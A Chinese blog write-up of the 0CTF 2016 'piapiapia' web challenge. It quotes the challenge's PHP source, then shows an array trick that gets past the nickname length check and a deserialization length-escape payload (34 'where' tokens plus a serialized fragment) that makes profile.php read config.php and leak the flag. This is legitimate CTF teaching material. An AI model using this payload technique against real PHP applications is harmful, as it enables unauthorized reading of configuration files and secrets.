[0CTF 2016]piapiapia

最新推荐文章于 2023-09-25 13:34:50 发布
最新推荐文章于 2023-09-25 13:34:50 发布
阅读量361 收藏
点赞数 1
分类专栏: buu
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/missht0/article/details/113275082
版权

[0CTF 2016]piapiapia

在这里插入图片描述
www.zip文件泄露,(其实我自己扫第一遍的时候没有扫到,后来多扫了几遍才扫到的)

config.php,里面有flag
在这里插入图片描述

update.php

<?php
	require_once('class.php');
	if($_SESSION['username'] == null) {
		die('Login First');	
	}
	if($_POST['phone'] && $_POST['email'] && $_POST['nickname'] && $_FILES['photo']) {

		$username = $_SESSION['username'];
		if(!preg_match('/^\d{11}$/', $_POST['phone']))
			die('Invalid phone');

		if(!preg_match('/^[_a-zA-Z0-9]{1,10}@[_a-zA-Z0-9]{1,10}\.[_a-zA-Z0-9]{1,10}$/', $_POST['email']))
			die('Invalid email');
		
		if(preg_match('/[^a-zA-Z0-9_]/', $_POST['nickname']) || strlen($_POST['nickname']) > 10)
			die('Invalid nickname');

		$file = $_FILES['photo'];
		if($file['size'] < 5 or $file['size'] > 1000000)
			die('Photo size error');

		move_uploaded_file($file['tmp_name'], 'upload/' . md5($file['name']));
		$profile['phone'] = $_POST['phone'];
		$profile['email'] = $_POST['email'];
		$profile['nickname'] = $_POST['nickname'];
		$profile['photo'] = 'upload/' . md5($file['name']);

		$user->update_profile($username, serialize($profile));
		echo 'Update Profile Success!<a href="profile.php">Your Profile</a>';
	}
	else {
?>

传四个参数,一大堆限制

知识点:参数传递数组绕过字符串检测

nickname的长度限制可以用数组绕过(nickname[])

profile.php

<?php
	require_once('class.php');
	if($_SESSION['username'] == null) {
		die('Login First');	
	}
	$username = $_SESSION['username'];
	$profile=$user->show_profile($username);
	if($profile  == null) {
		header('Location: update.php');
	}
	else {
		$profile = unserialize($profile);
		$phone = $profile['phone'];
		$email = $profile['email'];
		$nickname = $profile['nickname'];
		$photo = base64_encode(file_get_contents($profile['photo']));
?>

这里的file_get_contents($profile['photo'])是关键,要让$profile['photo']=config.php
所以要构建序列化
但是因为有在这里插入图片描述
$profile['photo']的值是不受我们控制的,这里就要用到字符串逃逸的知识点了
反序列化长度逃逸,必然是先把变量序列化,然后进行过滤,在过滤的过程中把某个关键词替换成了长度更长的关键词,导致长度加长,最终引起逃逸
因为对这个知识点的理解不深,所以后续关于反序列化长度逃逸的内容都是引用自这篇文章

可以得知他序列化后的字符串应为:

a:4:{s:5:"phone";s:11:"12345678901";s:5:"email";s:12:"12345@qq.com";s:8:"nickname";s:3:"123";s:5:"photo";s:39:"upload/07cc694b9b3fc636710fa08b6922c42b";}

在这里插入图片描述
把config.php从nickname塞进去就变成了

a:4:{s:5:"phone";s:11:"12345678901";s:5:"email";s:12:"12345@qq.com";s:8:"nickname";s:3:"123";s:5:"photo";s:10:"config.php";}s:39:"upload/07cc694b9b3fc636710fa08b6922c42b";}

在这里插入图片描述
虽然给他反序列化之后结果photo的部分是config,php,但这样是读不到config.php的,因为更新profile的时候根本没地方插进去,因此就需要从nickname入手把这些数据悄悄带进去
首先解决nickname的长度限制问题
直接将nickname变成数组就可突破限制

a:4:{s:5:"phone";s:11:"12345678901";s:5:"email";s:12:"12345@qq.com";s:8:"nickname";a:1:{i:0;s:3:"123";}s:5:"photo";s:10:"config.php";}s:39:"upload/07cc694b9b3fc636710fa08b6922c42b";}

在这里插入图片描述
但是现在$photo还是属于nickname的,要让它逃逸出来
在这里插入图片描述
这里有个正则替换,就是我们构造长度逃逸的关键
";}s:5:“photo”;s:10:“config.php”;}一共是34个字符,我们可以构造34个where让它在正则替换成hacker的过程中悄无声息地增加34个长度,那么";}s:5:“photo”;s:10:“config.php”;}就从nickname中逃逸出来了

那么现在应该是要注册账号,但是没有注册,根据文件应该是register.php
然后再update处抓包

在这里插入图片描述
修改nickname为数组
修改nickname的内容为34个where加上";}s:5:“photo”;s:10:“config.php”;}
在这里插入图片描述
一些warning,无伤大雅
发包
然后在profile.php的源代码里面可以找到flag的64编码

切谁怕谁
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
[0CTF-2016] piapiapia
Logerrik的博客
05-11 424
[0CTF-2016] piapiapia PHP反序列化字符逃逸 1.www.zip源码泄露 试了下发现不太像sql注入,扫下目录发现www.zip泄露 最近好多题都是这种源码泄露,建议字典齐全一点,不然扫不出来真的难受 2.源码 源码还挺多 config.php里面看到有flag,最后目标应该就是读取到config里面的flag就可以了 $config[‘hostname’] = ‘127.0.0.1’; $config[‘username’] = ‘root’; $config[‘password’
ctf piapiapia(反序列化逃逸)解题记录
rt555016的博客
07-28 960
ctf piapiapia(反序列化逃逸)解题记录 前言 出现漏洞的两个重要因素是:1、敏感函数,2、可控参数。 打开url是一个登录界面,而且只有一个登录按钮。由于看到了登录界面而且没有验证码所以第一个想法是尝试弱口令登录,显然不成功,所以在这里来走了弯路。该题首先是需要通过目录扫描得到源码压缩包、注册账户的地址,得到源码后进行代码审计,发现蛛丝马迹,最终通过构造修改用户名的字符串利用反序列化逃逸得到在config.php中的flag 一、使用dirserch目录扫描工具对目标进行目录扫描
0CTF piapiapia
Yang_99的博客
08-09 229
源码泄露 第一步是用扫描工具扫描到www.zip文件,获得网站源码。 看到网站目录结构。打开config.php发现有flag,所以我们的目的就是如何读取这个config.php 随便注册个号进去 这里就是注入点,之后会提到。 读源码 用代码审计工具发现几个要点,我们进去看看。 <?php require_once('class.php'); if($_SESSION['username'] == null) { die('Login First'); } $username = $_S
BUU刷题之代码审计
夜幕下的灯火阑珊的博客
05-06 624
[极客大挑战 2019]PHP 题目提示备份文件, 使用webscan工具扫描一下备份文件 py -2 main.py -u http://88bf6495-760a-4a63-aec1-7d1a3a9d9d0c.node3.buuoj.cn/ 扫描得到www.zip文件 解压得到index.php文件和class.php <?php include 'class.php'; ...
php反序列化长度变化尾部字符串逃逸(0CTF-2016-piapiapia)
10-15
0CTF-2016-piapiapia这个挑战中,问题出在`profile.php`中的`unserialize()`函数。此函数用于将用户从数据库中获取的已序列化的`$profile`字符串反序列化为对象。如果这个字符串的长度可以被攻击者控制,攻击者...
2016华山杯ctf安卓题目
06-17
2016年华山杯ctf安卓题目
CTF Writeups 2016.9.29
09-29
CTF Writeups 2016.9.29
0ctf_2016_warmup
05-17
20160ctf的pwn题。
BUU-0CTFpiapiapia(反序列化字符串逃逸)
unexpectedthing的博客
11-14 2894
前言 考点是反序列化字符串逃逸 wp 首先这个题,一进来就是一个登录平台,就属于一种基本的web网站的搭建,先登录再去后台,一般来说,可以sql注入之类的,但是我们习惯先看F12的源码,然后用御剑和dirsearch工具去扫描后台或者文件的泄露。 发现存在备份文件泄露,www.zip,得到源码 开始代码审计 config.php中发现了flag变量,看来题目目的是让我们读取config.php了。 我们来看下每个页面: index.php <?php require_once('class.php'
0CTF-2016-piapiapia(PHP反序列化字符逃逸)
crispr的博客
03-06 1217
0CTF-2016-piapiapia(PHP反序列化字符逃逸) 0x01 前言 开学果然是对更新博客没得想法,趁着闲工夫,做了一下这个题,之前XCTF新春赛也出现了PHP反序列化逃逸,不过没做出来。。tcl,直接看题吧。 0x02 正文 这个题直接给你登录页面了,F12没有发现,sql注入也不太像,一般出现登录页面都会有注册页面,字典跑起来,发现有regester.php、config.php...
OCTF2016--piapiapia
Oavinci的博客
06-27 315
知识点: php反序列化长度变化尾部字符串逃逸 目录扫描发现www.zip,下载得到源码 源码有index.php,输入账号密码后会进入profile.php,还有register.php、updata.php、class.php和config.php flag值在config.php中,想办法访问到其内容 通过seay代码审计找到一点线索 看到profile.php中存在任意文件读取漏洞,前面还有反序列化 现在我们有个大体思路了,update.php中有一个$prof..
[0CTF 2016]piapiapia 详细解题思路及做法
EC_Carrot的博客
12-09 1249
前言 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! 题目 进去是一个登陆界面,尝试sql注入,发现没什么用,但又没有其他功能了,只能扫描看看有没有源码泄露 这边用的是dirsearch,可以扫描出www.zip文件,但在BUUCTF里面做题需要设置延迟参数-x,不然扫描太快就全是返回429状态码。 在www.zip提供的源码里面主要有: index.php、profile.php、register.p
Htlab_Weekly_Ctf_16
qq_45628145的博客
07-26 544
有点另类的SSRF 输出127.0.0.1,有回显说要post一个admin 提示需要登陆 改成admin=1 试了一下发现是加X-Client-IP,其实遇到这种问题,也可以不这么麻烦,直接把X-Forwarded-For、X-Client-IP、X-Real-IP全部加上就好了,然后提示读源码 <?php // /opt/flag.txt function getUrlContent($url){ // $url = safe($url); $url = escapes
web buuctf [0CTF 2016]piapiapia
weixin_44214568的博客
04-11 805
知识点:1.反序列化字符串逃逸 1.开题 2.常规操作,看源码,查看robots.txt,disearch扫描 抓包,用常规的sql注入测试了一下,没啥效果,disearch扫描也结束了,看了下disearch扫描 有文件www.zip,是源码的一个包,下载下来 3.查看源码,没有路由文件,从index.php看,加载了config.php(里面有flag值),profile.php(会话已经加载的情况下读取信息),都看了一下文件,register.php(注册),注册了一个账号试了试,链
[0CTF 2016] piapiapia 题解
lonmar的博客
01-27 688
反序列化字符逃逸
BUUCTF [0CTF 2016] piapiapia
Senimo
01-05 766
BUUCTF [0CTF 2016] piapiapia 考点 php代码审计 反序列化字符串逃逸 启动环境: 首先是个登录框,只有登陆功能,尝试了一波弱密码和万能密码: 猜测可能不是,继续对题目进行信息收集,使用ctf-wscan扫描网站目录: python3 ctf-wscan.py http://xxx.cn/ 得到扫描结果: 查看到其存在注册页面: 访问update.php页面: 需要先进行登陆。 以及其存在源码泄露,下载www.zip到本地: 对源码进行分析,其中static中存
htctf-wp
a3uRa的一个窝
06-05 216
www.htctf.com BSidesSF2019CTF-kookie cookie / monster登陆后 刷新抓包 发现cookie中有个username 将其改为admin 放包 成功
[0CTF 2016]piapiapia 代码审计 字符串逃逸 绕过长度限制
m0_64180167的博客
09-25 100
第一次直接打包代码 然后查看有没有洞学习一下降低速度扫描dirsearch -t 2 超低速扫描扫到了/www.zip /profile.php /register.php /upload/ 未加参数 我们直接去看看我们直接下载备份文件即可。
ctf从0到1电子书
最新发布
12-14
《CTF从0到1》是一本针对CTF(Capture The Flag)竞赛的电子书,旨在帮助初学者快速入门和提高他们的技能。该书包括了CTF竞赛的基础知识、技巧和策略,并提供了详细的实例和实战练习,帮助读者从零开始逐步建立起...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值